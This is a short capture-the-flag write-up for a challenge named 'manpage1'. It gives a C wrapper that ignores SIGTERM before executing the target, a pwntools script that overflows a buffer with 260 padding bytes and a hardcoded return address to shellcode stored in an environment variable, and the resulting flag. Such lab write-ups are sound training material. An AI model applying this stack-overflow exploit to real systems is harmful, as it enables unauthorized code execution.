← Back
manpage1 | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.

View on GitHub

here is almost as before, but we defuse the SIGTERM by setting our signal handler, in this case, a simple SIG_IGN.

#include<signal.h>
#include<stdio.h>
#include<unistd.h>

int main(int argc, char **argv){
    if(argc < 2) {
        printf("Usage: too few arguments\n");
        return 1;
    }
    char pathname[20] = "/manpage/manpage1";
    char *argv_new[] = {pathname, argv[1], NULL};
    

    signal(SIGTERM, SIG_IGN);
    execv(pathname, argv);

    return 0;
}
// gcc -m32 level1.c -o level1


#!/usr/bin/python3
import sys
from pwn import *

shellcode_adderss = 0xffffd549

payload = b'A' * 260
payload += p32(shellcode_adderss)

sys.stdout.buffer.write(payload)

don’t forget to put the shellcode in an environment variable, and put the address of the shellcode in shellcode_address, in the payload.py file.

image

Flag: s8gSofSE2b